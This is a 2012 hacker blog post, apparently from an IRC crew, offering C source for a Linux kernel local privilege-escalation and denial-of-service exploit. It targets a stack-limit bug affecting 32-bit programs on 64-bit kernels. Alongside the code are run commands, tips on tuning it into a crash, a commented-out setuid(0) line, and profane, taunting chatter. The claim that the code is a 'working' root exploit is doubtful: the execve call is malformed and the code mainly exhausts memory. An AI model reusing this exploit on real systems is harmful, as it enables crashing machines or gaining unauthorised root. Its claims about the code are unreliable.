Help pay for xds lawyer fees.
LR

[356dayer :P]: num_args.c – WORKING localroot leaked as an exploit-form but was coded ages ago and modded,so it has been archived here at CC

Posted on 5th January 2012 in Exploits

Oki just a quicky for yas..but setup to run as proper bash shell spawned,wich is very kewl, as it was given thru a veryyyy leet dude,…yet its olkd…anyhow, let me know how it goes for thee :P and, what numbers work in thenumargs for your kernel..ya may want to play with that define alittle ;)
xd

#HAXNET,#DARKNET,#HAXSHELLS,#MAGICSHELLS,#ALBASHELLS @ EFNET NETWORK SOON ALSO ON UNDERNET PERHAPS ALTHO FREENODE SEEMS ABIT NICER..meh we see!
and, one Greet to pm ,only coz, i greet the other fkrs daily :P lol… joking again well…not reallllly..but, ya will love me I hope,oh yes, the first ‘manpic’ of me was found…good job to whoever did find… as, that was only one of a few but, yea…. they been around 2yrs even, 3 nearly..,anyhow..here, since you prolly have seen it, i willshow you, a true criminal..
http://i.imgur.com/j5DzX.jpg
Ohhh you wanted this thing here…..

/*
   known for over two years, fixed in grsec and also in SOME x86_64 but still works.... play with shell spawn abit
   bug is due to a bad limit on the max size of the stack for 32bit apps
   on a 64bit OS.   Instead of them being limited to 1/4th of a 32bit
   address space, they're limited to 1/4th of a 64bit address space -- oops!
   in combination with vanilla ASLR, it triggers a BUG() as the stack
   tries to expand around the address space when shifted
   Below mmap_min_addr you say? uh oh! ;)
   Reported to Ted Tso in December 2009
   Linus today (Aug 13 2010) silently fixes tangential issue:
   http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=320b2b8de12698082609ebbc1a17165727f4c893 <-- bug here,was d0s,can be dos again ,just make it 0xdeadbeef and your d0s will run fine locally on any 64/x86_64.
   The second bug here is that the memory usage explodes within the
   kernel from a single 128k allocation in userland
   The explosion of memory isn't accounted for by any task so it won't
   be terminated by the OOM killer
   curious what actual vuln was involved that they were trying
   to silently fix, as I don't think it's the one below
   clobbering data in a suid app by growing the stack into the mapping
   for the image? ;) 

   ulimit -s unlimited
   ./64

   SELinux is here to save us though with its fine-grained controls!
   Wait, it doesn't?
   Clearly the solution is to throw a buggy KVM on top of it
   Not enough?  Ok, we'll throw in an extra SELinux, that'll really
   throw those hackers off when they use the same exact exploit on the
   host as they do on the guest!
   COMMON CRITERIA HERE I COME!
xd says , fuck ur common whatever but, i do love u spenda , but, now what was this crippled for...silly execve cripples are only reasons to makesure it is atleast, used as a pentest kit...and, i do believe stragely this was submitted to AB also....but notsure if theyre used it...however, i believe they may have, and, this gives it abit more confidence... thx to my best ever friends online and theyre support , #Haxnet ,and the Ops from it, also #Darknet,and ofcourse Magicshells.com, for theyre continued support :)  thx iceman ;)  your a top guy sometimes.
....rambles abit more...now the heroin is kickin in...ill bbl....k....bye....now, any good finds on this like, ya can remove the per_svr_personality easily and this would change it, also, id be playin about with HOW the shell is executed ;)  anyhow, i have added 1 line then left it commented... but, this is a working pvt leak.... well, it wwas 'bought' by idiots, who now realise they paid for shit nice friends from haxnet and other channels, wrote!
fark u FD Lists still,valdis/DR/Jono,all still suckarsees,oh and did i mention zx2c :P  lol joking man! hes about one of rare ice ppl there,aswith George,Richard,even Valdis is ok :s sometimes.. but, anyhow, love to all who rooting, and, makesure any kernels etc, like, any offsetting, is addede and PMd to me..like, kernel versions etc..wich, i may try to play with... it is a very nice bug if u read its committ... kinda, 2in1er..better :s... enjoy...edited post by xd of haxnet ... f33r my arse,on your face.retard.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/personality.h>

#define NUM_ARGS 24550 // leave this alone unless you want this to become a 64bit d0s

int main(void) {
        char **args;
        char *str;
        int i;
        /* not needed, just makes it easier for machines with less RAM */
        personality(PER_LINUX32_3GB);
        str = malloc(128 * 1024);
        memset(str, 'A', 128 * 1024 - 1);
        str[128 * 1024 - 1] = '\0';
        args = malloc(NUM_ARGS * sizeof(char *));
        for (i = 0; i < (NUM_ARGS - 1); i++)
        args[i] = str;
        args[i] = NULL;
        //setuid(0);  // hrm....worth a shot ;)  depends how ya compi8le it...-O2 ;)  etc... who knowa... also, changed line below so works now.
        execve("/bin/sh", args);
        printf("[-] execve failed\n");
        return 0;
}

__EOF__

Now finally, i can go try Bsd v9!
fuckazzzzzzzzzzzzzz
pimps to my homie,paul and, we will r00l all very soon :>

comments: 1 » tags: , , ,